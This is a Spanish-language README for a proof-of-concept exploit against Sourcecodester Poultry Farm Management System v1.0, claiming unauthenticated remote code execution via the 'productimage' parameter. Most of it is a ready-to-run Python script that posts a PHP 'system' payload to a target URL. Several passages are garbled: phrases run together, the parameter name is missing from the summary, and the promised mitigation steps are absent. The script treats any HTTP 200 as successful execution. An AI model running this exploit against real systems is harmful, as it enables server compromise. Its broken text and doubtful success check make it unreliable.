
Prueba de concepto que demuestra la ejecución remota de código no autenticada en Sourcecodester Poultry Farm Management System a través del parámetro vulnerable productimage.
Este repositorio contiene un script de Prueba de Concepto (PoC) que demuestra una vulnerabilidad de ejecución remota de código (RCE) sin autenticación en Sourcecodester Poultry Farm Management System v1.0. La vulnerabilidad existe en el parámetro productimage en /farm/product.php, permitiendo a un atacante ejecutar código arbitrario en el servidor.
CVE-ID: (Pendiente)
Resumen: Sourcecodester Poultry Farm Management System v1.0 contiene una vulnerabilidad de ejecución remota de código (RCE) sin autenticación a través del parámetro en . Esta vulnerabilidad permite a un atacante ejecutar código arbitrario en el servidor sin autenticación.
productimage/farm/product.phpVersión Afectada:
requests (pip install requests)Este script demuestra cómo un atacante puede explotar la vulnerabilidad RCE enviando una solicitud maliciosa al parámetro vulnerable.
Guarde el siguiente script como rce_poc.py y ejecútelo.
import requests
# Configuration
target_url = "http://target-url/farm/product.php" # Change this to the target URL
# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"
# Construct the malicious request
data = {
'productimage': payload # The vulnerable parameter
}
def exploit_rce(url, data):
"""
Exploit the RCE vulnerability by sending a malicious request to the target URL.
Args:
url (str): The target URL.
data (dict): The data to be sent in the POST request.
"""
try:
response = requests.post(url, data=data)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200:
print("[+] Successfully executed the payload.")
else:
print("[-] Failed to execute the payload.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Sending malicious request to: {target_url}")
exploit_rce(target_url, data)
target_url a la URL del endpoint /farm/product.php del servidor vulnerable.productimage.exploit_rce() envía la solicitud maliciosa a la URL objetivo e imprime los detalles de la respuesta.Para mitigar esta vulnerabilidad, aplique los siguientes pasos:
Siguiendo estos pasos de mitigación y las mejores prácticas de seguridad, puede prevenir vulnerabilidades como este problema de RCE en Sourcecodester Poultry Farm Management System v1.0.